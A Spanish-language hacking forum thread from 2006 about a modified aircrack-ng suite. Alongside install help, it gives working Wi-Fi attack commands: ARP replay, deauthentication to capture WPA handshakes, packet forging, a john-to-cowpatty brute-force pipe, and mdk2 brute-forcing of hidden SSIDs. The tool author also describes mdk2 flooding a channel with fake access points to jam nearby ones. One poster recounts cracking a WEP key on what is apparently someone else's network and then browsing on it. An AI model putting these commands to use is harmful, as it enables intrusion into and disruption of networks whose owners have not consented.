Publicado por: thefkboss en 12 Octubre 2006, 16:05 pm
si es la 0.7

pues añadire todo lo q se pueda y todo lo q posteen en la pagina oficial.

en cuanto a lo del abocon fijo q es como lo de linksys solo q lo envia a otro sitio.
haz una cosa enviame una captura fichero cap pero pequeña es decir q captures durante un poco de tiempo cuando no haya clientes sin inyectar ni nada solo una capturiya de 1 min 2 o 5 no mas pero sin clientes subelo algun server  si puedes y me envias un IM y si es igual q el linksys se puede hacer algo parecido.


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: rh3nt0n en 12 Octubre 2006, 16:11 pm
dicho y hecho , lo bueno que perjudicao o no ...  ;D ;D , no te afecta , ya que compilan perfectamente .. ;D ;D

Muchas gracias :)


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: longits en 12 Octubre 2006, 16:18 pm
Ok thefkboss lo voy a intentar el problema es que cuando no hay ni un cliente conectado no suelta ni un paquete, tiene que ser con un -1 y -3 (q por cierto sale perfect).

Bueno voy a dejarlo algun rato a ver si pilla alguno espontaneo

Gracias y saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: thefkboss en 12 Octubre 2006, 18:01 pm
o bueno pruebalo si eso con un cliente pero sin inyectar tu ni aosciarte para ver a donde van los datos por si se puede poner un filtro xq lo q lleva los linksys es un filtro mas q nada


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: .NiXoN. en 12 Octubre 2006, 22:49 pm
Wenas !!!

Pues veran compañeros e intentado instalar en Ubuntu (ya me pase a Ubuntu xDDD) la versión 0.7, y me da un error:
Citar
nixon@laptop:~/Desktop/aircrack-ng-0.6_motherfucker_edition_07$ sudo make install
install -d /usr/local/bin
install -m 755 aircrack-ng airdecap-ng arpforge-ng packetforge-ng ivstools ska afrag kstats /usr/local/bin
install: no se puede efectuar `stat' sobre `aircrack-ng': No existe el fichero ó directorio
install: no se puede efectuar `stat' sobre `airdecap-ng': No existe el fichero ó directorio
install: no se puede efectuar `stat' sobre `arpforge-ng': No existe el fichero ó directorio
install: no se puede efectuar `stat' sobre `packetforge-ng': No existe el fichero ó directorio
install: no se puede efectuar `stat' sobre `ivstools': No existe el fichero ó directorio
install: no se puede efectuar `stat' sobre `ska': No existe el fichero ó directorio
install: no se puede efectuar `stat' sobre `afrag': No existe el fichero ó directorio
install: no se puede efectuar `stat' sobre `kstats': No existe el fichero ó directorio
make: *** [install] Error 1

De que puede ser??

Saludos !! y gracias !!


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: pianista en 12 Octubre 2006, 22:59 pm
Ummm has hecho antes el sudo ./configure y el sudo make???
Saludosss


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: rh3nt0n en 12 Octubre 2006, 23:01 pm
el make lo hace bien ??

a mi me instala bien despues del make ..

Citar
rh3nt0n@rh3nt0n-laptop:~/wifi/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.7/aircrack-ng-0.6_motherfucker_edition_07$ sudo make install
Password:
install -d /usr/local/bin
install -m 755 aircrack-ng airdecap-ng arpforge-ng packetforge-ng ivstools ska afrag kstats /usr/local/bin
install -d /usr/local/sbin
install -m 755 aireplay-ng airodump-ng packetforge-ng  /usr/local/sbin
install -m 755 airmon-ng /usr/local/sbin
install -d /usr/local/man/man1
install -m 644 ./manpages/* /usr/local/man/man1
rh3nt0n@rh3nt0n-laptop:~/wifi/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.7/aircrack-ng-0.6_motherfucker_edition_07$

tienes instaladas las headers del kernel y build-essentials ??

enhorabuena , por tu nuevo sistema :)

saludos

PD:
Ummm has hecho antes el sudo ./configure y el sudo make???
Saludosss
el ./configure no es necesario


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: .NiXoN. en 13 Octubre 2006, 02:44 am
Wenas !!

Ya esta arrreglado, gracias x todo. Ahora e iniciado el sistema y ahora va.
Citar
headers del kernel y build-essential

Sip, las instalé pero no reinicie. Veo que es como Windows...jaja que tienes que reiniciar para que se acabe de instalar... xDDDDd

Citar
enhorabuena , por tu nuevo sistema  :)
Muchisimas gracias  :-[

Saludos !!


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: locgat en 13 Octubre 2006, 15:15 pm
para utilizar las capturas del airodump mf 0.7 para sacar una clave wpa, es necesario utilizar la opcion de capturar todos los beacons? o con el primero que coge ya es suficiente? gracias.

Por cierto es raro que no haya ningun programa que utilice fuerza bruta de verdad, no diccionarios, o sea que vaya probando claves desde: a, aa, ab, ac ........zzzzzzzzzzzzzzzzzzzzzz no? bueno vale los numeros y signos tambien.


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: thefkboss en 13 Octubre 2006, 18:39 pm
para sacar una clave wpa necesitas un handsake y para eso o esperas a q se conecte el cleinte o le haces un ataque 0 de 5 paquetes.
en cuanto a lo del diccionario no hay nada


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: tumismo en 13 Octubre 2006, 20:31 pm
hola señores creo k esta no es la sección ams adecuada para esto pero estoy loco yaaaaaa
 haber si algun alma caritativa me hecha un cable.....soy novato pero el k mas en linux he instalado ubuntu y no tengo ni idea ,por mas k busco , de como instalar los madwifi y tampoco se como instalar el aircrack ng si alguien me puede dar un poco de luz uso una atheros sin mas un saludo y me voy a respirar un poco de air por k aki delante me voy a volver lokkkkko


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: locgat en 13 Octubre 2006, 21:25 pm
bueno vale, lo del handshake lo sabia, me referia a como por lo que eh leido no sirve utilizar la opcion --ivs, o sea no sirve solo capturar ivs, pues eso, si con solo un beacon, y los demas datos me sirve, o utilizo la opcion de capturar todos los beacons, no se si me explico.... y por ultimo hacer un ataque 0 con 5 paquetes? de donde saco esos 5 paquetes? ademas el ataque 0 no es para desautenticar clientes? si no hay ninguno de que me sirve?

P.D. Creo que cada dia se algo menos, jeje.


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: thefkboss en 14 Octubre 2006, 14:24 pm
pues si el atake 0 es para desauntentificar clientes efectivamente al desautentificarlo el cliente se vuleve a conectar y te envia el handsake xq vacia su tabla.
Si no hay clientes no hay nada q hacer olvidate( lo q no se es para q le ponen entonces proteccion WPA  a un AP si no lo usan no se me resulta raro q un AP no tenga clientes es como si tienes una caja fuerte enorme en tu casa y no la usas para q la tienes )
efectivamente aqui ya no sirve el comando --ivs y lo tienes q cuardar como cap no ivs te quedaria:

Código:
airodump-ng -w nombre del archivo -c canal <tarjeta de q dispones>

los beacons no sirven para nada es como solo una informacion continua diciendo q ese Ap se llama tal q tiene esa proteccion ya ya esta nada mas no contiene la clave WPA


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: tumismo en 15 Octubre 2006, 19:20 pm
he conseguido solucionar algunos de mis problemas.....pero no he conseguido instalar los madwifi....tengo ubuntu instalado sirven esos madwifi o mejor cambiarlos?
luego en airodump-ng k tipo de ataque deberia ejecutar para sacar las pass de un linksys wrt54 y luego otro al k le intente era un d-link 2000 ap+ . no se si los dos aps son de los k llamais dificiles pero no consegui sacarles nada....sin mas un saludo thks.


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: rh3nt0n en 15 Octubre 2006, 21:08 pm
es recomendable que instales los madwifi-ng patcheados para inyeccion , ademas van muy bien .
mirate este link :
http://hwagm.elhacker.net/drivers-ng/driver-ng.htm
saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: thefkboss en 15 Octubre 2006, 21:19 pm
pues los atakes los de siempre siempre necesitaras mas de 1 millon de ivs para sacarla.
la version 0.7 lleva un parche q lo q hace es descartar unos paquetes q envian los linksys


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: o2T7f6j2 en 15 Octubre 2006, 22:45 pm
Muy bueno, thefkboss, :)

Al parecer estos puntos de acceso están proliferando, y sospecho que igual que linksys ahora envía esos paquetes comenzarán otras marcas a enviar otros, por lo que quizá tengas que meter una relación "marca-modelo/tipo-de-paquete-a-descartar" en un futuro. Porque esto del WPA no acaba de despuntar.

Salu2


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: n!b en 16 Octubre 2006, 07:13 am
Por cierto es raro que no haya ningun programa que utilice fuerza bruta de verdad, no diccionarios, o sea que vaya probando claves desde: a, aa, ab, ac ........zzzzzzzzzzzzzzzzzzzzzz no? bueno vale los numeros y signos tambien.

Podes usar john para armar un listado de combinaciones y pasarlo como parametro al cowpatty, podes armar permutaciones de palabras o tambien de letras y simular un ataque de fuerza bruta

Código:
john -w:dictionary.txt -rules -session:johnrestore.dat -stdout:63 | cowpatty -r capture.cap -f--s


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: vyvyan en 16 Octubre 2006, 09:42 am
Hola a tod@s,

Os cuento mi experiencia por si puede serviros de algo. Después de muchos, pero que muchos intentos para captar IV’s a saco (con casi todos los Live-CD de Linux existentes) y de pruebas con portátiles con la Intel-2200 y tras muchas decepciones, he conseguido capturar 1 millón de IV’s buenas en unas 3-4 horas. Parece mentira, verdad? Yo tampoco me lo creía y menos cuando después de unos 35 minutos ejecutando el aircrack-ng 06 en el XP, apareció el tan ansiado “KEY FOUND!” y un chorro de 26 números. Después de configurar la conexión con ese clave Wep, voilá!; a navegar por la red!

Como? Pues leí en algún post que un chico lo había conseguido de la siguiente manera:

PC de sobremesa, equipado con:

Windows-XP Professional
Tarjeta USB Netgear WG111 con los drivers wildpackets para poder monitorizar.
Tarjeta PCI SMC normal y corriente con los drivers de fábrica.
Software: Aircrack-ng motherfucker edition v.06
Imprescindible: que en el aire haya una WiFi con un nivel de señal bueno (en mi caso era de casi el 100%)

Lo que he hecho (advierto que quizás tuve mucha suerte, no lo sé): me conecto a la red WiFi existente con la tarjeta normal SMC, entonces me pide la clave wep y le pongo 1111111111. Se conecta aunque evidentemente solo envía paquetes y no recibe ninguno. Hasta aquí, todo normal. Dejo esta conexión en marcha y arranco el airodump, lo configuro para la USB WG111 y para el canal al que estoy “conectado” con la otra tarjeta. Le digo que sólo me guarde los IV’s buenos. Empieza a pillar IV como un loco y en una hora ya tengo casi 150 mil. Bien, me voy un par de horas en bici (porque sino me quedo enganchado a la pantalla mirando como crecen los #). Cuando vuelvo, arranco el arcrack-ng y al cabo de unos 35 minutos, tengo la clave!. Increíble. Estaba flipando y pensando que me iba a dar la clave inventada que yo le había puesto (1111111111), que seria lo lógico, no? Pues me dio la wep buena (y era de 26 dígitos!).

Conclusiones: no tengo ni idea de por qué, pero ha sido incluso demasiado fácil. Como he dicho antes, quizás fue suerte sumada a que en el momento de captar los IV’s había mucho trafico (quizás por e-mule o similar). Repito, no lo sé.

Espero que sirva de ayuda y acepto posibles explicaciones de cómo lo he conseguido (aunque es más que nada por curiosidad).

Un saludo.


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: dcialdella en 16 Octubre 2006, 15:09 pm

Buenas... tengo nu problema, he leido todo este thread... pero no encuentro lo que busco, lo siento...

tengo una placa dwl650 (viejita) adaptada con una antena mejorada...

uso debian 2.4.27, kernel recompilado y drivers hostap.

Funciona correctamente, aparece wlan0, admite
iwconfig wlan0 mode monitor.

PREGUNTA
¿Es mejor madwifi o hostap ?


corro kismet y todo bien,
corro airodump-ng y todo bien, veo varias redes con wep

pusimos un router con wep para probar el crack.

el airodump-ng muestra paquetes, el canal de la placa, velocidad, todo bien, debajo aparecen clietnes conectados y el router


luego corremos

aireplay-ng -3 -r test1 -b xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy wlan0

aparece un warning
WLAN0 (WE) Buffer for request SIOCGIWPRIV too small (16<90)
varias veces y luego

SAVING ARP REQUESTS IN REPLAY_ARP.CAP

yOU SOULD ALSA START AIRODUMP-NG TO CAPTURE REPLIES
READ 312312 PACKETS (GOT 18 arp rEQUESTS), SENT 277123

PREGUNTA
lleva varios minutos pero solo 18 ARPs...

alguna idea ?

gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: dcialdella en 16 Octubre 2006, 15:24 pm

LISTO!!! resuelto, es que faltaba aplicar el patch al 0.4.7
lei el link de COMO INSTALAR DRIVERS y listo...
ahora vuelan los IV.............

gracias.


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: rh3nt0n en 16 Octubre 2006, 17:39 pm

Buenas... tengo nu problema, he leido todo este thread... pero no encuentro lo que busco, lo siento...

tengo una placa dwl650 (viejita) adaptada con una antena mejorada...

uso debian 2.4.27, kernel recompilado y drivers hostap.

Funciona correctamente, aparece wlan0, admite
iwconfig wlan0 mode monitor.

PREGUNTA
¿Es mejor madwifi o hostap ?


corro kismet y todo bien,
corro airodump-ng y todo bien, veo varias redes con wep

pusimos un router con wep para probar el crack.

el airodump-ng muestra paquetes, el canal de la placa, velocidad, todo bien, debajo aparecen clietnes conectados y el router


luego corremos

aireplay-ng -3 -r test1 -b xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy wlan0

ya has capturado ARP's , por eso usas -r ?



aparece un warning
WLAN0 (WE) Buffer for request SIOCGIWPRIV too small (16<90)
varias veces y luego

SAVING ARP REQUESTS IN REPLAY_ARP.CAP

yOU SOULD ALSA START AIRODUMP-NG TO CAPTURE REPLIES
READ 312312 PACKETS (GOT 18 arp rEQUESTS), SENT 277123

PREGUNTA
lleva varios minutos pero solo 18 ARPs...

esos ARP's , lo mas probable es que sean los que tienes en el archivo test1 .

deberias estar usando airodump-ng a la vez .

alguna idea ?

la unica idea es que uses los atakes de la forma habitual ..

Código:
airodump -b bssid -c canal -w test wlan0 
aireplay-ng -3  -b xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy -x 1024 -g 1000000 wlan0

los madwifi-ng van muuuy bien , yo usaria estos ..

gracias



Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: dcialdella en 17 Octubre 2006, 10:25 am

gracias por la respuesta, al final acabó funcionando bien.

el problema (por si le sirve a alguien mas) creo que estaba en que faltaba patchear el driver hostap, tuve que bajar el 0.4.9 aplicarle el patch, make, make install, y reboot y luego, sin cambiar nada mas y haciendo la misma secuencia, todo fue bien.

Ahora probaré los drivers de madwifi... muchas gracias de nuevo


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: satanas092 en 17 Octubre 2006, 13:00 pm
Hola muy buenas...
Donde me puedo bajar este programa para Windows???  El enlace de la primera página no funciona.

Gracias y un saludo.


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: rh3nt0n en 17 Octubre 2006, 13:22 pm
las mejoras son para la aplicacion bajo linux .
tienes 7 enlaces , al menos los 5 ultimos funcionan sin problemas.
saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: thefkboss en 17 Octubre 2006, 14:38 pm
es algo q no sabia configurar Armenos de su server pero prueba a boton derecho guardar como


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: Armenos en 17 Octubre 2006, 14:40 pm
es algo q no sabia configurar Armenos de su server pero prueba a boton derecho guardar como

Tocará que también los mirroree rh3nt0n :P A los zips y los rar les tiene manía el server jejeje Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: dany-r5 en 17 Octubre 2006, 14:56 pm
Tengo una duda respecto a la utilización del comando packetforge que figura en el tercer post de la página 7 de este tema. ¿cuáles exactamente son los parámetros -h y -c, porque el -a está claro que es la mac del AP, pero los otros 2... respecto al tipo de paquete, sirve --ipwsys?. El -y supongo que es el .xor que ha creado el ataque chopchop y qué modo me recomendáis utilizar? porque viendo la lista no sé por cuál decidirme, jeje.
Nada más, sólo comentar que el ataque chopchop me funciona desde ubuntu con una ipw2200 y que si me explicais los parámetros del packetforge ya os comentaré si consigo que funcione.
Muchas gracias y un saludo!


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: thefkboss en 17 Octubre 2006, 15:18 pm
prueba esto:

packetforge-ng --udp   -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o

h=cliente legitimo o tu si estas asociado al AP mejor cliente legitimo
c=ff:ff:ff:ff:ff:ff
y=archivo xor
ip origen=la q sea la q te de la gana
ip destino=192.168.1.255 el 255 final es siempre el resto es de acuerdo a tu puerta de enlace.

luego te generar una archivo llamado ejemplo o como tu le pongas y lo reinyectas con el 2.
si te funciona el chop-chop con la ipw2200 este tambien te funcionara


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: ZariK en 17 Octubre 2006, 19:45 pm
Wenas,

 me podriais decir cm usar los diccionarios para las redes imagenio para las claves wep. Lo digo pq haber si es posible sacar una clave wep predeterminada xo q tenga el essid cambiado.. cm ago ese diccionario? para poder usar el data q recoja cn el airodump y poder desencriptarlo cn wepattack?

Gracias. Saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: thefkboss en 17 Octubre 2006, 20:17 pm
pues si no sabes el essid esta dificil el tema xq te tendrias q hacer un diccionario con todas las posibilidades.
tendrias q hacerlo x ejemplo con el wlandecrypter create un diccionario adecuado al comienzo de la Mac y ir probando con wlan00 wlan 01 wlan 02....asi todas las posiblidades calro esta en HEX


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: ragtap en 17 Octubre 2006, 21:58 pm
Seguro que lo que voy a preguntar estara por mil sitios, pero yo la verdad es que no lo encuentro....

Me gustaria saber si es posible sustituir el aircrack que viene en el backtrack por el de thefkboss.
Tengo el backtrack instalado en el pc con la instalacion de 800 (live cd) y quizas sea tan facil como sustituir algo o similar....

Podrias decirme como se hace??

Saludos y gracias!


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: rh3nt0n en 17 Octubre 2006, 22:52 pm
solo tienes que instalarlo sin mas , al instalarlo , como los ejecutables son los mismos , se sobre escriben ..

ademas no creo que te de problemas al compilar, ya que back|track suele llevar las sources .. etc

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: ragtap en 17 Octubre 2006, 23:32 pm
Joder, no consigo instalarlo; siempre me da el mismo error:

No rule to make target "src/sha1-mmx.S" needed by aircrack-ng

Que puede ser?


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: rh3nt0n en 18 Octubre 2006, 00:11 am
joder , pues si que da problemas  :-X
que maquina estas usando ?
solo te da esa linea de error ?? pega el resto si es que hay mas lineas ...
en principio te falta ese archivo , pero es la primera vez que lo veo ..  :o

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: ragtap en 18 Octubre 2006, 00:54 am
Si, en principio solo me da ese error... y es raro por que si que lo tiene!!! no lo entiendo, pero seguro que algo estoy haciendo mal.

Lo seguire intentando, pero de momento nada.

Gracias de todos modos!


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: thefkboss en 18 Octubre 2006, 14:40 pm
pues en bactrack funciona xq hay es donde hago todas las pruebas simplemete es instalarlo normal y corriente no hace falta mas.
lo q me parece rraro es eso error nose se me ocurre una cosa pero a lo mejor no tiene nada q ver q micro tienes me refiero al micro de la placa base (es por algo q lei en el foro del aircrack-ng no sera un intel con tecnologia mmx????)


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: rh3nt0n en 18 Octubre 2006, 15:23 pm
pues en bactrack funciona xq hay es donde hago todas las pruebas simplemete es instalarlo normal y corriente no hace falta mas.
lo q me parece rraro es eso error nose se me ocurre una cosa pero a lo mejor no tiene nada q ver q micro tienes me refiero al micro de la placa base (es por algo q lei en el foro del aircrack-ng no sera un intel con tecnologia mmx????)
joder , pues si que da problemas  :-X
que maquina estas usando ?
solo te da esa linea de error ?? pega el resto si es que hay mas lineas ...
en principio te falta ese archivo , pero es la primera vez que lo veo ..  :o

saludos

a mi tambien me parece que pueda ser por el micro , no sera un pentium mmx ??


saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: MrLove en 19 Octubre 2006, 18:04 pm
Gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (noticias)
Publicado por: thefkboss en 25 Octubre 2006, 21:26 pm
pues ya tengo casi terminada esta nueva version.
q lleva nuevo pues......
un par de cosillas ahora cuando el SSID esta oculto veremos de cuantos digitos se compone siempre y cuando no haya clientes esto es debido a un fallo en los bacons q se aprovecha y dereis para q sirve esto pues voy a incluir la utilidad MDK2 de ASPj q hace fuerza bruta con el AP para descubrir su SSID sin ningun cliente conectado.
Ademas esta utilidad sirve para crear un numero tan grande de AP con filtrado wep inesistentes q responden a ataques. de esta forma si un atakante intentase escanear la red  con el netstumbler o con el kismet le da error ya q el numero sera tan grande q no prodra verlos es una medida de proteccion, tambien si esta muy saturado el canal en el q emites congela a los demas AP y solo deja emitir al tuyo vamos una pasada de programa

PD:espero q lo useis con fines didacticos.jajaja.Ahora empezaremos a ver multitud de AP al rededor nuestro.jajaja

PD2:estoy pensando q os parece si cambio las SSID q vienen del creador por SSID


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (noticias)
Publicado por: rh3nt0n en 26 Octubre 2006, 00:16 am
pues ya tengo casi terminada esta nueva version.
q lleva nuevo pues......
un par de cosillas ahora cuando el SSID esta oculto veremos de cuantos digitos se compone siempre y cuando no haya clientes esto es debido a un fallo en los bacons q se aprovecha y dereis para q sirve esto pues voy a incluir la utilidad MDK2 de ASPj q hace fuerza bruta con el AP para descubrir su SSID sin ningun cliente conectado.
Ademas esta utilidad sirve para crear un numero tan grande de AP con filtrado wep inesistentes q responden a ataques. de esta forma si un atakante intentase escanear la red  con el netstumbler o con el kismet le da error ya q el numero sera tan grande q no prodra verlos es una medida de proteccion, tambien si esta muy saturado el canal en el q emites congela a los demas AP y solo deja emitir al tuyo vamos una pasada de programa

PD:espero q lo useis con fines didacticos.jajaja.Ahora empezaremos a ver multitud de AP al rededor nuestro.jajaja

jaja

PD2:estoy pensando q os parece si cambio las SSID q vienen del creador por SSID

ganas tengo de probarlo tio ... joe

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (noticias)
Publicado por: HeLLCiTo en 26 Octubre 2006, 01:02 am
bueno, a ver que creo que hago mal ,

tengo 1510682 IVs y no hay manera

Citar
aircrack-ng -a 1 -b 00:14:a5:05:**:** mirouter-03.ivs

Citar
aircrack-ng -a 1 -y -b 00:14:a5:**:**:** mirouter-03.ivs


y no hay manera el primero se queda ahi ejecutando pero no hace nada , lei por ahi que sino la saca al momento nada

el segundo me devuelve

Citar
   Attack failed. Possible reasons:

     * Out of luck: you must capture more IVs. Usually, 104-bit WEP
       can be cracked with about one million IVs, sometimes more.

     * If all votes seem equal, or if there are many negative votes,
       then the capture file is corrupted, or the key is not static.

     * A false positive prevented the key from being found.  Try to
       disable each korek attack (-k 1 .. 17), raise the fudge factor
       (-f)or try the standard attack mode instead (no -y option).

esto es lo del txt

Citar
00:14:A5:05:**:**, 11,  54, WEP ,, OPN,   7,   243240,  1533927,   0.  0.  0.  0, R-wlan11                        ,


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (noticias)
Publicado por: HeLLCiTo en 26 Octubre 2006, 09:47 am
bueno ya la pillo pero le hicieron falta millon y medio de ivs, aun no la he provado.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (noticias)
Publicado por: thefkboss en 26 Octubre 2006, 14:29 pm
bueno pues ya lo teneis disponible:

http://www.bluntmen.com/aircrack-ng-0.6_motherfucker_edition_0.8.tar.gz

se han cambiado un par de cosillas el ska el afrag y el mdk se encuetran dentro de una carpeta q se llama complementos cada uno lleva su makefile y hay q instalarlos si los quieres usar independientemente del aircrack.

Lo nuevo de esta version es q ahora las redes con SSID oculto el airodump te dira la longitud maxima del texto q lleva y despues sacaremos este usando la fuerza bruta del programa MDK2 de la siguiente forma.

instalamos MDK2 y ejecutamos de la siguiente forma para hacer el ataque:

Código:
mdk2 <interface> p -b <caracteres a usar> -t <bssid>

caracteres a usar:

n  solo numeors
l   letras en minusculas
u  letras en mayusculas
c   minusculas y mayusculas
m lminusculas y mayusculas y numeros
a   todoslos caracteres

detras de caracteres puedes especificar un SSID de lamisma longitud del SSID real para comenzar la fuerza bruta desde ese nombre haciendo las posibles combinaciones.

Ejemplo:
Código:
mdk2 ra0 p -b n 010020 -t 00:11:22:33:44:55 -s 100

-s=paquetes por segundo a enviar para hacer el ataque


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: YanPakal en 26 Octubre 2006, 15:06 pm
Joder, no consigo instalarlo; siempre me da el mismo error:

No rule to make target "src/sha1-mmx.S" needed by aircrack-ng

Que puede ser?

Me pasaba lo mismo al instalar aircrack-ng, en GNU/linux es importante fijarse en las mayusculas/minusculas, cambie el nombre del archivo de sha1-mmx.s a sha1-mmx.S y ya lo encuentra.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: rh3nt0n en 26 Octubre 2006, 15:43 pm
http://www.bluntmen.com/aircrack-ng-0.6_motherfucker_edition_0.8.tar.gz

aki tienes el mirror, man :)

gracias por el curro , compila y funciona perfectamente , al menos lo basico , el afrag , MDK2 , y ska , no he tenido tiempo de probarlos , pero compilan sin problemas.
saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: Serch_Serch en 26 Octubre 2006, 16:09 pm
Y en modo grafico todo esto... es pedir demasiado no?? :rolleyes:


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: rh3nt0n en 26 Octubre 2006, 16:12 pm
Y en modo grafico todo esto... es pedir demasiado no?? :rolleyes:

hay que ver , con lo que mola la terminal ... :)  ;D ;D

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: longits en 26 Octubre 2006, 18:30 pm
Juer q pasada q este proyecto siga en pie, muchas gracias thefkboss.

Otra pasada sería que alguien le metiera mano al hax puppy, seria ya la repera.

Gracias y saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: Serch_Serch en 26 Octubre 2006, 20:11 pm
Pues yo sigo con lo mismo. Interface grafico seria una pasada y si encima, te diera la Gate ya sería la coña  :D


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: thefkboss en 26 Octubre 2006, 20:15 pm
lo del hax puppy lo estuve mirando para meterle mano pero es demasiado complicado me refiero a uno muy currado.
pensaba ponerme a hacerlo pero es un lio de la ostia xq hay q bajarse drivers parchearlos con los úlitmos parches del -ng no valen los viejos a veces hay q hacerlo a ojo y probarlos y lo demas con el kernel y las aplicaciones xq para q funcione bien las tarejtas hay q aplicar parches al kernel no es como el viejo q con solo parchear el driver valia ahora tambien hay q parchear el kernel. por eso es un kurro q te cagas para q funcione q te cagas version profesional.
tabien estuve mirando hacerlo con el SLAX pero lo mismo viene hacer ya no valen bajarse los modulos directamente y aplicarlos empiezan a ser cada dia mas complicado


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: thefkboss en 26 Octubre 2006, 20:17 pm
Código:
Pues yo sigo con lo mismo. Interface grafico seria una pasada y si encima, te diera la Gate ya sería la coña
no te digo q no pero ten encuenta q es complicado de cojones si no lo hacen ni lo de la pagina oficial para su version y solo tienen un script es xq cuesta un huevo y medio del otro.
en cuanto a lo de la GATE solo te la da si esta sin  contraseña.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: Serch_Serch en 26 Octubre 2006, 20:45 pm
Pero si al final sabemos la clave y tenemos el file de captura, xq no puede decirnos la gate?? (Una vez q sepamos la clave)


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: epidemya en 3 Noviembre 2006, 14:29 pm
Cuando instalo el aircrack-ng motherfucker 0.8 en el hax-puppy(live CD+USB), solo lo puedo ejecutarlo desde la carpeta en la se descomprio e hice el make&& make install, y solo funciona si pongo el punto y la barra antes de ejecutar cualquier progrma de la suite.¿Es normal? Se puede hacer de alguna marnera para que funcione desde cualquier shell y no tengas que estar en la carpeta del programa. Espero vuestra ayuda.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: rh3nt0n en 3 Noviembre 2006, 16:21 pm
el sudo make install , no se habra efectuao con exito .
vuelve a intentarlo , si lo instalas de 0 :
Código:
make clean 
make
sudo make install
passw: tu_password

si solo haces el make install , entras en el directorio desde la terminal :
Código:
sudo make install 
passw:

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: pianista en 4 Noviembre 2006, 01:14 am
Umm si no prueba a iniciar el aircrack o el aireplay con el comando sudo delante...
Ej: Sudo aireplay-ng......
Saludoss


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: LMF7 en 4 Noviembre 2006, 17:54 pm
